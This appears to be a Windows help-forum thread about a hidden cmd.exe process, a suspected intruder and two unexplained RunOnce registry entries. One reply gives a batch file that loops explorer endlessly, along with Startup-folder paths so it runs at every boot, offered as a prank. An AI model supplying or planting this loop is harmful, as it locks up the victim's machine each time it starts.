Will cmd.exe run without user action?

[Castout]

Does it need any internet connection in clean system because if not I intend to block its internet access and could it run itself from time to time without user action when system is at idle(no usage)?


Just curious

I know it's the command prompt I found out that it was trying to run in the background. Avira, Malwarebytes, Threatfire scans all found nothing in my system.

Command windows can run hidden.
Something is launching it as it should never start on it's own.
And never hidden like you posted.

I'd run 'Hijack This' and get a report of what is Starting up when you
power up your system.

I can think of several reasons it would run at start up, then not shut down.

[the_tyrant]

try this!

in notepad, input this:
@echo off
:a
explorer
goto a

save the above 4 lines as a batch (.bat) file

drag it in (the folders are hidden)
C:\Documents and Settings\(user)\Start Menu\Programs\Startup (if your using xp)
or

C:\users\(user)\AppData\Roaming\Microsoft\Windows\ Start Menu (if your using vista)

C:\Users\(User-Name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (if your using windows 7)

restart and you shall feel the power of the batch file!

Don't actually though

anyways, command prompt popping up can be because you are running programs based in command prompt (telnet, ping, nmap, etc)
or it can be because you are running batch files

of course, it could be some really clumsy hacker

[Castout]

Yeah it was a hacker.

he hacked into my system and created account for himself which I got rid before but he's getting smarter that the hacked reg entries won't show on on Hijack this list but it will show up if you copy and paste the log . . . . .

He made the gadgets inaccessible and made my PC to abruptly powered off and unable to start.

Guess it was a Christmas present. I'm sure more to come

[Castout]

Quote:

Originally Posted by MaddogK

nice to know, but keep in mind some apps do actually start a cmd window when executed in order to perform certain tasks. This is a classic example of why one should not run with admin rights all the time.

Yeah I'm not sure if it was hacker but my gadgets became inaccessible and I found new suspicious registry entries while no other new software has been installed.

The following 2:
O4 - HKUS\S-1-5-18\..\RunOnce: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [] (User 'Default user')

I found them on earlier scan and already deleted them and confirmed they were deleted but they were back yesterday but was not listed on HijackList list except if you copy and paste the log file. In fact they didn't show on the log file either but if you copy and paste the log file they will get shown

I don't think I have any app that's using cmd.exe.
Funny thing the log showed the cmd.exe came from a folder which I could not find even if I already unhide all hidden folder and files.

[Castout]

Can anybody suggest whether the following two entries exist in their windows 7 hijackthis list?

Or are they part of malware?

The following 2:
O4 - HKUS\S-1-5-18\..\RunOnce: [] (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [] (User 'Default user')

Please the last thing I want is ruining my Seven installation. I already deleted them and now wondering.